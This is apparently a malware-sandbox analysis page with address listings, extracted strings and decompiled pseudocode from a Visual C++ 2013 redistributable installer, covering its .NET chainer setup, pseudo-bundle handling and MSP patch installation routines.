0x012a4bdd
0x012a4be2
0x012a4be5
0x00000000
0x012a4be5
0x012a4b63
0x012a4b63
0x012a4b6b
0x012a4b72
0x012a4b72
0x012a4b77
0x012a4b7b
0x012a4b7d
0x012a4b7d
0x012a4b8a
0x012a4b8f
0x012a4b92
0x00000000
0x012a4b92
0x012a4b46
0x012a4b46
0x00000000
0x012a4b46
0x012a4af3
0x012a4af3
0x012a4afb
0x012a4b02
0x012a4b02
0x012a4b07
0x012a4b0b
0x012a4b0d
0x012a4b0d
0x012a4b1a
0x012a4b1f
0x00000000
0x012a4b1f
0x012a4ad6
0x012a4ad6
0x012a4c5f
0x012a4c5f
0x00000000
0x012a4c5f
0x012a4a8b
0x012a4a8b
0x012a4a93
0x012a4a9a
0x012a4a9a
0x012a4a9f
0x012a4aa3
0x012a4aa5
0x012a4aa5
0x012a4ab2
0x012a4ab7
0x012a4b22
0x012a4b22
0x012a4c33
0x012a4c33
0x012a4c34
0x012a4c39
0x012a4a5b
0x012a4a5b
0x012a4a68
0x012a4a6d
0x012a4a72
0x012a4c60
0x012a4c60
0x012a4c66
0x012a4ce1
0x012a4ce6
0x012a4ce6
0x012a4ced
0x012a4cef
0x012a4cf4
0x012a4cf7
0x012a4cf7
0x012a4cfd
0x012a4cfd
0x012a4d08

APIs

Part of subcall function 012B233B: GetProcessHeap.KERNEL32(?,00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B234C
Part of subcall function 012B233B: RtlAllocateHeap.NTDLL(00000000,?,01283087,?,00000000,?,?,?,00000000), ref: 012B2353

CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000018,00000001,00000000,00000000,00000000,?,?,012A4E23,?,?,?), ref: 012A4A7E
GetLastError.KERNEL32(?,?,012A4E23,?,?,?), ref: 012A4A8B
ReleaseMutex.KERNEL32(?), ref: 012A4CF7

Strings

Failed to create event: %ls, xrefs: 012A4B22
Failed to memory map cabinet file: %ls, xrefs: 012A4BE5
Failed to allocate memory for NetFxChainer struct., xrefs: 012A4A6D
failed to allocate memory for event name, xrefs: 012A4AD6
Failed to MapViewOfFile for %ls., xrefs: 012A4C2E
Failed to create mutex: %ls, xrefs: 012A4B92
failed to copy event name to shared memory structure., xrefs: 012A4C5A
NetFxChainer.cpp, xrefs: 012A4A63, 012A4AAD, 012A4B15, 012A4B85, 012A4BD8, 012A4C21
%ls_mutex, xrefs: 012A4B32
%ls_send, xrefs: 012A4AC2
failed to allocate memory for mutex name, xrefs: 012A4B46

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
API String ID: 3944734951-2991465304
Opcode ID: 6fc476ac36cb171fa88551d3da7e7b6ff07de15732aa1c63c073ea267e19b88a
Instruction ID: 85a0674edab455cc5daee361f8737df4ab4e28725d6806bebf27fef6da9a326b
Opcode Fuzzy Hash: 6fc476ac36cb171fa88551d3da7e7b6ff07de15732aa1c63c073ea267e19b88a
Instruction Fuzzy Hash: E37165B226034AEFC730AF64DCC9E697BE6EB14744F58493CF30AAB201D2B5D9008760

Uniqueness

Uniqueness Score: -1.00%

Function 012A401F Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 337
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E012A401F(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, short* _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, short _a60, short _a64, intOrPtr* _a68, short _a72, intOrPtr _a76) {
				signed int _v8;
				intOrPtr _t86;
				intOrPtr* _t88;
				intOrPtr _t91;
				short _t93;
				short _t97;
				short _t101;
				short* _t102;
				intOrPtr _t104;
				intOrPtr _t107;
				short _t109;
				short _t111;
				short _t113;
				short _t116;
				intOrPtr _t135;
				void* _t149;
				intOrPtr _t150;
				intOrPtr* _t152;
				intOrPtr _t159;
				void* _t167;
				short _t168;
				short _t178;
				intOrPtr _t182;
				intOrPtr _t184;
				void* _t186;

				_t167 = __edx;
				_t149 = __ebx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				if(E0128BE0D(_a24) != 0) {
					E012B177A( &_v8, L" -%ls", _t85);
					_t186 = _t186 + 0xc;
				}
				_t86 = E012B233B(8, 1);
				_t184 = _a12;
				 *((intOrPtr*)(_t184 + 0x7c)) = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t184 + 0x80)) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c)))) = E012B233B(0x58, 1);
					_t88 =  *((intOrPtr*)(_t184 + 0x7c));
					__eflags = _t88;
					if(_t88 != 0) {
						_t158 = _a48;
						 *((intOrPtr*)( *_t88 + 4)) = 3;
						_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c))));
						_push(_t149);
						_t150 = _a44;
						 *((intOrPtr*)(_t91 + 0x10)) = _t150;
						 *((intOrPtr*)(_t91 + 0x14)) = _a48;
						_t93 = E012B1171(_a48, _t167,  *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c)))), _a20, 0);
						__eflags = _t93;
						if(_t93 >= 0) {
							_t97 = E012B1171(_t158, _t167,  *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c)))) + 0x18, _a32, 0);
							__eflags = _t97;
							if(_t97 >= 0) {
								_t101 = E012B1171(_t158, _t167,  *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c)))) + 0x38, _a36, 0);
								__eflags = _t101;
								if(_t101 >= 0) {
									_t102 = _a40;
									__eflags = _t102;
									if(_t102 == 0) {
										L17:
										__eflags = _a72;
										if(_a72 == 0) {
											L21:
											_t159 = _a28;
											__eflags = _t159 - 4;
											if(_t159 == 4) {
												L24:
												_t104 = 1;
												__eflags = 1;
												_t168 = 1;
											} else {
												__eflags = _t159 - 3;
												if(_t159 == 3) {
													goto L24;
												} else {
													_t168 = 0;
													_t104 = 1;
												}
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c)) + 4)) = _t168;
											 *((intOrPtr*)(_t184 + 0xa8)) = _t104;
											 *((intOrPtr*)(_t184 + 0x8c)) = _t104;
											 *((intOrPtr*)(_t184 + 0x14)) = _a16;
											 *((intOrPtr*)(_t184 + 0x40)) = _t159;
											__eflags = _t159 - 4;
											if(_t159 == 4) {
												L28:
												_push(2);
												_pop(0);
											} else {
												__eflags = _t159 - 3;
												if(_t159 == 3) {
													goto L28;
												} else {
												}
											}
											 *((intOrPtr*)(_t184 + 0x44)) = 0;
											_t107 = _a48;
											 *((intOrPtr*)(_t184 + 0x2c)) = _t107;
											 *((intOrPtr*)(_t184 + 0x34)) = _t107;
											 *((intOrPtr*)(_t184 + 0x28)) = _t150;
											 *((intOrPtr*)(_t184 + 0x30)) = _t150;
											 *((intOrPtr*)(_t184 + 0x1c)) = _a52;
											_t109 = E012B1171(_t159, _t168, _t184, _a20, 0);
											__eflags = _t109;
											if(_t109 >= 0) {
												_t111 = E012B1171(_t159, _t168, _t184 + 0x24, _a20, 0);
												__eflags = _t111;
												if(_t111 >= 0) {
													_t151 = _t184 + 0x94;
													_t178 = E012B1171(_t159, _t168, _t184 + 0x94, _a56, 0);
													__eflags = _t178;
													if(_t178 >= 0) {
														__eflags = _v8;
														if(_v8 == 0) {
															L38:
															__eflags = _a60;
															if(_a60 == 0) {
																L45:
																__eflags = _a64;
																if(_a64 == 0) {
																	L52:
																	__eflags = _a8 - 0x30006;
																	if(__eflags < 0) {
																		L56:
																		_t113 = 0;
																		__eflags = 0;
																	} else {
																		if(__eflags > 0) {
																			L55:
																			_t113 = 1;
																		} else {
																			__eflags = _a4 - 0x8ad0000;
																			if(_a4 < 0x8ad0000) {
																				goto L56;
																			} else {
																				goto L55;
																			}
																		}
																	}
																	_t152 = _a68;
																	 *((intOrPtr*)(_t184 + 0xb0)) = _t113;
																	__eflags = _t152;
																	if(_t152 != 0) {
																		_t116 = E012B233B(0x10, 1);
																		 *((intOrPtr*)(_t184 + 0x84)) = _t116;
																		__eflags = _t116;
																		if(_t116 != 0) {
																			 *((intOrPtr*)(_t184 + 0x88)) = 1;
																			_t160 =  *((intOrPtr*)(_t152 + 0xc));
																			 *((intOrPtr*)(_t116 + 0xc)) =  *((intOrPtr*)(_t152 + 0xc));
																			_t178 = E012B1171( *((intOrPtr*)(_t152 + 0xc)), _t168,  *((intOrPtr*)(_t184 + 0x84)),  *_t152, 0);
																			__eflags = _t178;
																			if(_t178 < 0) {
																				goto L30;
																			} else {
																				_t178 = E012B1171(_t160, _t168,  *((intOrPtr*)(_t184 + 0x84)) + 4,  *((intOrPtr*)(_t152 + 4)), 0);
																				__eflags = _t178;
																				if(_t178 >= 0) {
																					_t178 = E012B1171(_t160, _t168,  *((intOrPtr*)(_t184 + 0x84)) + 8,  *((intOrPtr*)(_t152 + 8)), 0);
																					__eflags = _t178;
																					if(_t178 < 0) {
																						_push("Failed to copy display name for pseudo bundle.");
																						goto L65;
																					}
																				} else {
																					_push("Failed to copy version for pseudo bundle.");
																					goto L65;
																				}
																			}
																		} else {
																			_t178 = 0x8007000e;
																			E012B294E(_t116, "pseudobundle.cpp", 0x8a, 0x8007000e);
																			_push("Failed to allocate memory for dependency providers.");
																			goto L65;
																		}
																	}
																} else {
																	_t154 = _t184 + 0x9c;
																	_t178 = E012B1171(_t159, _t168, _t184 + 0x9c, _a64, 0);
																	__eflags = _t178;
																	if(_t178 >= 0) {
																		__eflags = _v8;
																		if(_v8 == 0) {
																			L51:
																			 *((intOrPtr*)(_t184 + 0x18)) = 1;
																			goto L52;
																		} else {
																			_t178 = E012B1325(_t159, _t154, _v8, 0);
																			__eflags = _t178;
																			if(_t178 >= 0) {
																				goto L51;
																			} else {
																				_push("Failed to append relation type to uninstall arguments for related bundle package");
																				goto L65;
																			}
																		}
																	} else {
																		_push("Failed to copy uninstall arguments for related bundle package");
																		goto L65;
																	}
																}
															} else {
																_t155 = _t184 + 0x98;
																_t178 = E012B1171(_t159, _t168, _t184 + 0x98, _a60, 0);
																__eflags = _t178;
																if(_t178 >= 0) {
																	__eflags = _v8;
																	if(_v8 == 0) {
																		L44:
																		 *((intOrPtr*)(_t184 + 0xac)) = 1;
																		goto L45;
																	} else {
																		_t178 = E012B1325(_t159, _t155, _v8, 0);
																		__eflags = _t178;
																		if(_t178 >= 0) {
																			goto L44;
																		} else {
																			_push("Failed to append relation type to repair arguments for related bundle package");
																			goto L65;
																		}
																	}
																} else {
																	_push("Failed to copy repair arguments for related bundle package");
																	goto L65;
																}
															}
														} else {
															_t178 = E012B1325(_t159, _t151, _v8, 0);
															__eflags = _t178;
															if(_t178 >= 0) {
																goto L38;
															} else {
																_push("Failed to append relation type to install arguments for related bundle package");
																goto L65;
															}
														}
													} else {
														_push("Failed to copy install arguments for related bundle package");
														goto L65;
													}
												} else {
													_push("Failed to copy cache id for pseudo bundle.");
													goto L65;
												}
											} else {
												L30:
												_push("Failed to copy key for pseudo bundle.");
												goto L65;
											}
										} else {
											_t182 = _a76;
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c)))) + 0x30)) = E012B233B(_t182, 0);
											_t135 =  *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c))));
											__eflags =  *((intOrPtr*)(_t135 + 0x30));
											if( *((intOrPtr*)(_t135 + 0x30)) != 0) {
												 *((intOrPtr*)(_t135 + 0x34)) = _t182;
												E012A8221( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c)))) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c)))) + 0x34)), _a72, _t182);
												goto L21;
											} else {
												_t178 = 0x8007000e;
												E012B294E(_t135, "pseudobundle.cpp", 0x47, 0x8007000e);
												_push("Failed to allocate memory for pseudo bundle payload hash.");
												goto L65;
											}
										}
									} else {
										__eflags =  *_t102;
										if( *_t102 == 0) {
											goto L17;
										} else {
											_t178 = E012B1171(_t158, _t167,  *((intOrPtr*)( *((intOrPtr*)(_t184 + 0x7c)))) + 0x40, _t102, 0);
											__eflags = _t178;
											if(_t178 >= 0) {
												goto L17;
											} else {
												_push("Failed to copy download source for pseudo bundle.");
												goto L65;
											}
										}
									}
								} else {
									_push("Failed to copy local source path for pseudo bundle.");
									goto L65;
								}
							} else {
								_push("Failed to copy filename for pseudo bundle.");
								goto L65;
							}
						} else {
							_push("Failed to copy key for pseudo bundle payload.");
							L65:
							_push(_t178);
							E012AFA86();
						}
					} else {
						_t178 = 0x8007000e;
						E012B294E(_t88, "pseudobundle.cpp", 0x31, 0x8007000e);
						_push("Failed to allocate space for burn payload inside of related bundle struct");
						goto L6;
					}
				} else {
					_t178 = 0x8007000e;
					E012B294E(_t86, "pseudobundle.cpp", 0x2d, 0x8007000e);
					_push("Failed to allocate space for burn package payload inside of related bundle struct");
					L6:
					_push(_t178);
					E012AFA86();
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t178;
			}

0x012a401f
0x012a401f
0x012a4022
0x012a4026
0x012a4031
0x012a403d
0x012a4042
0x012a4042
0x012a404d
0x012a4052
0x012a4055
0x012a405a
0x012a4078
0x012a4086
0x012a4088
0x012a408b
0x012a408d
0x012a40b5
0x012a40b8
0x012a40c2
0x012a40c4
0x012a40c5
0x012a40c8
0x012a40d0
0x012a40d8
0x012a40df
0x012a40e1
0x012a40fb
0x012a4102
0x012a4104
0x012a411e
0x012a4125
0x012a4127
0x012a4133
0x012a4136
0x012a4138
0x012a4161
0x012a4161
0x012a4165
0x012a41bb
0x012a41bb
0x012a41be
0x012a41c1
0x012a41cf
0x012a41d1
0x012a41d1
0x012a41d2
0x012a41c3
0x012a41c3
0x012a41c6
0x00000000
0x012a41c8
0x012a41ca
0x012a41cc
0x012a41cc
0x012a41c6
0x012a41d7
0x012a41da
0x012a41e0
0x012a41e9
0x012a41ec
0x012a41ef
0x012a41f2
0x012a41fd
0x012a41fd
0x012a41ff
0x012a41f4
0x012a41f4
0x012a41f7
0x00000000
0x012a41f9
0x012a41f9
0x012a41f7
0x012a4200
0x012a4203
0x012a420b
0x012a420e
0x012a4215
0x012a4218
0x012a421b
0x012a421e
0x012a4225
0x012a4227
0x012a423c
0x012a4243
0x012a4245
0x012a4256
0x012a4262
0x012a4264
0x012a4266
0x012a4272
0x012a4276
0x012a4293
0x012a4293
0x012a4297
0x012a42e5
0x012a42e5
0x012a42e9
0x012a4334
0x012a4334
0x012a433b
0x012a434d
0x012a434d
0x012a434d
0x012a433d
0x012a433d
0x012a4348
0x012a434a
0x012a433f
0x012a433f
0x012a4346
0x00000000
0x00000000
0x00000000
0x00000000
0x012a4346
0x012a433d
0x012a434f
0x012a4352
0x012a4358
0x012a435a
0x012a4366
0x012a436b
0x012a4371
0x012a4373
0x012a4391
0x012a4397
0x012a439c
0x012a43ac
0x012a43ae
0x012a43b0
0x00000000
0x012a43b6
0x012a43ca
0x012a43cc
0x012a43ce
0x012a43eb
0x012a43ed
0x012a43ef
0x012a43f1
0x00000000
0x012a43f1
0x012a43d0
0x012a43d0
0x00000000
0x012a43d0
0x012a43ce
0x012a4375
0x012a4375
0x012a4385
0x012a438a
0x00000000
0x012a438a
0x012a4373
0x012a42eb
0x012a42f0
0x012a42fc
0x012a42fe
0x012a4300
0x012a430c
0x012a4310
0x012a432d
0x012a432d
0x00000000
0x012a4312
0x012a431d
0x012a431f
0x012a4321
0x00000000
0x012a4323
0x012a4323
0x00000000
0x012a4323
0x012a4321
0x012a4302
0x012a4302
0x00000000
0x012a4302
0x012a4300
0x012a4299
0x012a429e
0x012a42aa
0x012a42ac
0x012a42ae
0x012a42ba
0x012a42be
0x012a42db
0x012a42db
0x00000000
0x012a42c0
0x012a42cb
0x012a42cd
0x012a42cf
0x00000000
0x012a42d1
0x012a42d1
0x00000000
0x012a42d1
0x012a42cf
0x012a42b0
0x012a42b0
0x00000000
0x012a42b0
0x012a42ae
0x012a4278
0x012a4283
0x012a4285
0x012a4287
0x00000000
0x012a4289
0x012a4289
0x00000000
0x012a4289
0x012a4287
0x012a4268
0x012a4268
0x00000000
0x012a4268
0x012a4247
0x012a4247
0x00000000
0x012a4247
0x012a4229
0x012a4229
0x012a4229
0x00000000
0x012a4229
0x012a4167
0x012a4167
0x012a4177
0x012a417d
0x012a417f
0x012a4183
0x012a41a1
0x012a41b3
0x00000000
0x012a4185
0x012a4185
0x012a4192
0x012a4197
0x00000000
0x012a4197
0x012a4183
0x012a413a
0x012a413a
0x012a413e
0x00000000
0x012a4140
0x012a4151
0x012a4153
0x012a4155
0x00000000
0x012a4157
0x012a4157
0x00000000
0x012a4157
0x012a4155
0x012a413e
0x012a4129
0x012a4129
0x00000000
0x012a4129
0x012a4106
0x012a4106
0x00000000
0x012a4106
0x012a40e3
0x012a40e3
0x012a43f6
0x012a43f6
0x012a43f7
0x012a43fd
0x012a408f
0x012a408f
0x012a409c
0x012a40a1
0x00000000
0x012a40a1
0x012a405c
0x012a405c
0x012a4069
0x012a406e
0x012a40a6
0x012a40a6
0x012a40a7
0x012a40ad
0x012a4403
0x012a4408
0x012a4408
0x012a4412

Strings

Failed to copy install arguments for related bundle package, xrefs: 012A4268
Failed to copy download source for pseudo bundle., xrefs: 012A4157
Failed to append relation type to repair arguments for related bundle package, xrefs: 012A42D1
Failed to copy display name for pseudo bundle., xrefs: 012A43F1
Failed to append relation type to uninstall arguments for related bundle package, xrefs: 012A4323
Failed to copy version for pseudo bundle., xrefs: 012A43D0
Failed to copy key for pseudo bundle., xrefs: 012A4229
Failed to allocate memory for pseudo bundle payload hash., xrefs: 012A4197
Failed to copy repair arguments for related bundle package, xrefs: 012A42B0
pseudobundle.cpp, xrefs: 012A4064, 012A4097, 012A418D, 012A4380
Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 012A406E
Failed to allocate memory for dependency providers., xrefs: 012A438A
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 012A40A1
Failed to copy key for pseudo bundle payload., xrefs: 012A40E3
Failed to copy cache id for pseudo bundle., xrefs: 012A4247
Failed to copy filename for pseudo bundle., xrefs: 012A4106
Failed to copy local source path for pseudo bundle., xrefs: 012A4129
Failed to append relation type to install arguments for related bundle package, xrefs: 012A4289
Failed to copy uninstall arguments for related bundle package, xrefs: 012A4302
-%ls, xrefs: 012A4037

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
API String ID: 1357844191-2832335422
Opcode ID: c42bbf843877e0ebbb4c316486e5d47d6f7b7542a660b5600e1c75fd1e5b92b4
Instruction ID: a0f9c85cfe54f13f98ff04dcbd6996ec08d80a041dab33fdae128b6d99bae652
Opcode Fuzzy Hash: c42bbf843877e0ebbb4c316486e5d47d6f7b7542a660b5600e1c75fd1e5b92b4
Instruction Fuzzy Hash: 93C1C471270786EFDB22EF29CC41FAA76E5AF84750F68451EEA199B250DBF0E4118B10

Uniqueness

Uniqueness Score: -1.00%

Function 0129DA9F Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0129DA9F(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				signed int _v8;
				char _v1584;
				char _v1588;
				char _v1592;
				intOrPtr* _v1596;
				char _v1600;
				signed int _v1604;
				char _v1608;
				char _v1612;
				char _v1616;
				intOrPtr* _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t107;
				intOrPtr* _t118;
				intOrPtr _t119;
				void* _t126;
				void* _t130;
				void* _t141;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr _t151;
				void* _t153;
				intOrPtr _t159;
				signed int _t182;
				intOrPtr* _t183;
				void* _t195;
				void* _t199;
				intOrPtr _t200;
				intOrPtr _t201;
				signed int _t202;

				_t195 = __edx;
				_t107 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t107 ^ _t202;
				_v1628 = _a4;
				_v1624 = _a12;
				_v1632 = _a20;
				_t201 = _a8;
				_v1636 = _a24;
				_v1620 = _a28;
				asm("sbb edi, edi");
				_t182 = 0;
				_t199 = ( ~( *( *((intOrPtr*)(_t201 + 8)) + 0x98)) & 0xfffffeff) + 0x102;
				E012A7E30( &_v1584, 0, 0x628);
				_v1616 = 0;
				_v1600 = 0;
				_v1612 = 0;
				_v1592 = 0;
				_v1588 = 0;
				_v1608 = 0;
				_v1604 = 0;
				if( *((intOrPtr*)(_t201 + 0x2c)) > 0) {
					while(1) {
						__eflags =  *((intOrPtr*)(_t201 + 0x24)) - 2;
						_t188 = _v1604;
						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0x28)) + 4 + _v1604 * 8));
						_v1596 = _t118;
						if( *((intOrPtr*)(_t201 + 0x24)) != 2) {
							goto L8;
						}
						_t188 =  &_v1600;
						_t183 = E0129743F( &_v1600, _t199,  *((intOrPtr*)(_t118 + 0x14)),  *((intOrPtr*)(_t118 + 0x24)),  &_v1600);
						__eflags = _t183;
						if(_t183 < 0) {
							E012AFA86(_t183, "Failed to get cached path for MSP package: %ls",  *_v1596);
							_t200 = 0;
							L47:
							E012B41E9( &_v1584);
							if(_v1600 != _t200) {
								E012B01E8(_v1600);
							}
							if(_v1612 != _t200) {
								E012B01E8(_v1612);
							}
							if(_v1588 != _t200) {
								E012B01E8(_v1588);
							}
							if(_v1608 != _t200) {
								E012B01E8(_v1608);
							}
							if(_v1592 != _t200) {
								E012B01E8(_v1592);
							}
							_t126 = _v1616 - _t200;
							if(_t126 == 0) {
								 *_v1620 = _t200;
							} else {
								_t130 = _t126 - 1;
								if(_t130 == 0) {
									 *_v1620 = 1;
								} else {
									if(_t130 == 1) {
										 *_v1620 = 2;
									}
								}
							}
							return E012A7EAA(_t183, _t183, _v8 ^ _t202, _t195, _t200, _t201);
						}
						_t183 = E012B201F( &_v1600, _t195, _v1600,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v1596 + 0x7c)))) + 0x18)),  &_v1612);
						__eflags = _t183;
						if(_t183 < 0) {
							_push("Failed to build MSP path.");
							L17:
							_push(_t183);
							E012AFA86();
							_t200 = 0;
							L46:
							goto L47;
						}
						_t119 = _v1612;
						_t182 = 0;
						L9:
						_v1596 = _t119;
						__eflags = _v1592 - _t182;
						if(_v1592 == _t182) {
							L12:
							_t183 = E012B1325(_t188,  &_v1592, _v1596, _t182);
							__eflags = _t183;
							if(_t183 < 0) {
								_push("Failed to append patch.");
								goto L17;
							}
							_v1604 = _v1604 + 1;
							__eflags = _v1604 -  *((intOrPtr*)(_t201 + 0x2c));
							if(_v1604 <  *((intOrPtr*)(_t201 + 0x2c))) {
								_t182 = 0;
								__eflags = 0;
								continue;
							}
							goto L1;
						}
						_t183 = E012B1325(_t188,  &_v1592, ";", _t182);
						__eflags = _t183;
						if(_t183 < 0) {
							_push("Failed to semi-colon delimit patches.");
							goto L17;
						}
						_t182 = 0;
						__eflags = 0;
						goto L12;
						L8:
						_t119 =  *((intOrPtr*)(_t118 + 0x90));
						goto L9;
					}
				}
				L1:
				_t141 = E012B4CFE(_v1632, _t199, _v1628, _v1636, _a16,  &_v1584);
				_t200 = 0;
				if(_t141 >= 0) {
					_t142 =  *((intOrPtr*)(_t201 + 0x1c));
					__eflags = _t142;
					if(_t142 == 0) {
						L24:
						_t144 = E0129C569(_t200,  *((intOrPtr*)( *((intOrPtr*)(_t201 + 8)) + 0x9c)),  *((intOrPtr*)( *((intOrPtr*)(_t201 + 8)) + 0xa0)), _v1624, _a16,  &_v1588, _t200);
						__eflags = _t144 - _t200;
						if(_t144 >= _t200) {
							_t194 =  &_v1608;
							_t183 = E0129C569(_t200,  *((intOrPtr*)( *((intOrPtr*)(_t201 + 8)) + 0x9c)),  *((intOrPtr*)( *((intOrPtr*)(_t201 + 8)) + 0xa0)), _v1624, _a16,  &_v1608, 1);
							__eflags = _t183 - _t200;
							if(_t183 >= _t200) {
								_push( *((intOrPtr*)(_t201 + 0xc)));
								_push(_v1608);
								_push(_v1592);
								_push(E012917CA( *((intOrPtr*)(_t201 + 0x24))));
								E01281566(2, 0x20000132,  *((intOrPtr*)( *((intOrPtr*)(_t201 + 8)))));
								_t151 =  *((intOrPtr*)(_t201 + 0x24)) - 1;
								__eflags = _t151;
								if(_t151 == 0) {
									_t153 = E012B1325( &_v1608,  &_v1588, L" REBOOT=ReallySuppress", _t200);
									__eflags = _t153 - _t200;
									if(_t153 >= _t200) {
										_push(L"IGNOREDEPENDENCIES");
										__eflags = E012B177A( &_v1588, L"%ls %ls=ALL", _v1588) - _t200;
										if(__eflags >= 0) {
											_t183 = E012B4666(__eflags, _v1592,  *((intOrPtr*)(_t201 + 0xc)), _v1588,  &_v1616);
											__eflags = _t183 - _t200;
											if(_t183 >= _t200) {
												goto L47;
											}
											_push("Failed to uninstall MSP package.");
											goto L45;
										}
										_push("Failed to add the list of dependencies to ignore to the properties.");
										goto L45;
									}
									_push("Failed to add reboot suppression property on uninstall.");
									goto L45;
								}
								_t159 = _t151 - 1;
								__eflags = _t159;
								if(_t159 == 0) {
									L31:
									_t183 = E012B1325(_t194,  &_v1588, L" PATCH=\"", _t200);
									__eflags = _t183 - _t200;
									if(_t183 >= _t200) {
										_t183 = E012B1325(_t194,  &_v1588, _v1592, _t200);
										__eflags = _t183 - _t200;
										if(_t183 >= _t200) {
											_t183 = E012B1325(_t194,  &_v1588, L"\" REBOOT=ReallySuppress", _t200);
											__eflags = _t183 - _t200;
											if(__eflags >= 0) {
												_t183 = E012B45C8(__eflags,  *((intOrPtr*)(_t201 + 0xc)), _t200, 5, _v1588,  &_v1616);
												__eflags = _t183 - _t200;
												if(_t183 >= _t200) {
													goto L47;
												}
												_push("Failed to install MSP package.");
												goto L45;
											}
											_push("Failed to add reboot suppression property on install.");
											goto L45;
										}
										_push("Failed to add patches to PATCH property on install.");
										goto L45;
									}
									_push("Failed to add PATCH property on install.");
									goto L45;
								}
								__eflags = _t159 != 3;
								if(_t159 != 3) {
									goto L47;
								}
								goto L31;
							}
							_push("Failed to add properties to obfuscated argument string.");
							goto L45;
						}
						_push("Failed to add properties to argument string.");
						goto L45;
					}
					__eflags =  *_t142;
					if( *_t142 == 0) {
						goto L24;
					}
					_t183 = E012B41A2(0x1fdf, _t142, 0);
					__eflags = _t183;
					if(_t183 >= 0) {
						goto L24;
					}
					_push( *((intOrPtr*)(_t201 + 0x1c)));
					E012AFA86(_t183, "Failed to enable logging for package: %ls to: %ls",  *((intOrPtr*)( *((intOrPtr*)(_t201 + 8)))));
					goto L47;
				} else {
					_push("Failed to initialize external UI handler.");
					L45:
					_push(_t183);
					E012AFA86();
					goto L46;
				}
			}

0x0129da9f
0x0129daa8
0x0129daaf
0x0129dab5
0x0129dabe
0x0129dac7
0x0129dad2
0x0129dad5
0x0129dadf
0x0129daf0
0x0129daf7
0x0129db07
0x0129db0d
0x0129db15
0x0129db1b
0x0129db21
0x0129db27
0x0129db2d
0x0129db33
0x0129db39
0x0129db42
0x0129db7e
0x0129db7e
0x0129db85
0x0129db8b
0x0129db8f
0x0129db95
0x00000000
0x00000000
0x0129db97
0x0129dba9
0x0129dbab
0x0129dbad
